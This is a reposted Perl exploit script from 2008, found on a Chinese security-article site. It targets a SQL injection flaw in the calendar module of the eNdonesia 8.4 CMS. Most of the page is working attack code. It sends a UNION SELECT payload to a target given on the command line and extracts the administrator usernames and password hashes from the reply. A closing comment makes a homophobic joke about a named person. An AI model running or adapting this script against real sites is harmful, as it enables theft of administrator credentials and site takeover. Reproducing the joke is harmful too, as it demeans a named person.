eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit

来源：www.MainHack.com 作者：Jack 发布时间：2008-07-31

#!/usr/bin/perl
#/-----------------------------------------------\
#| /-----------------------------------------\ |
#| | Remote SQL Exploit                     | |
#| | eNdonesia 8.4 Remote SQL Exploit       | |
#| | www.endonesia.org                      | |
#| | Calendar Module                        | |
#| \-----------------------------------------/ |
#| /-----------------------------------------\ |
#| | Presented By Jack                      | |
#| | MainHack Enterprise                    | |
#| | www.MainHack.com & irc.nob0dy.net      | |
#| | #MainHack #nob0dy #BaliemHackerlink    | |
#| | Jack[at]MainHack[dot]com               | |
#| \-----------------------------------------/ |
#| /-----------------------------------------\ |
#| | Hello To: Indonesian h4x0r             | |
#| | yadoy666,n0c0py & okedeh               | |
#| | VOP Crew [Vaksin13,OoN_BoY,Paman]      | |
#| | NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull | |
#| | all MainHack BrotherHood               | |
#| \-----------------------------------------/ |
#\-----------------------------------------------/

use HTTP::Request;
use LWP::UserAgent;

$sql_vulnerable = "/mod.php?mod=calendar&op=list_events&loc_id=";
$sql_injection = "-999/**/union+select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where%20name%20pwd";

if(!@ARGV) { &help;exit(1);}

sub help(){
       print "\n [?] eNdonesia 8.4 Remote SQL Exploit\n";
       print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
       print " [?] Use : perl $0 www.target.com\n";
       print " [?] Dont use \"http://\"\n";
       print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
       print " [?] Baliem Hacker - VOP crew - MainHack BrotherHood \n\n";
       print " [?] www.MainHack.com\n\n";
}

while (){
      my $target    = $ARGV[0];
       my $exploit   = "http://".$target.$sql_vulnerable.$sql_injection;
       print "\n [-] Trying to inject $target ...\n\n";
       my $request   = HTTP::Request->new(GET=>$exploit);
       my $useragent = LWP::UserAgent->new();
       $useragent->timeout(10);
       my $response   = $useragent->request($request);
       if ($response->is_success){
               my $res = $response->content;
               if ($res =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {
                       my ($username,$passwd) = ($1,$2);
                       print " [target] $target \n";
                       print " [loginx] $username:$passwd \n\n";
                       exit(0);
               }
               else {
                       die " [error] Fail to get username and password.\n\n";
               }
       }
       else {
               die " [error] Fail to inject $target \n\n";
       }
}

#/----------------------------------------------------------------\
#| NoGay kalo kita artikan sepintas berarti Tidak ada Gay        |
#| namun mari kita perhatikan secara seksama ...                 |
#| NoGay merupakan kependekan dari NoGe is Gay.                  |
#| Sungguh, penyembunyian sebuah karakter di balik makna kata.   |
#\----------------------------------------------------------------/
#Vendor Has been contacted and now working for it.

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告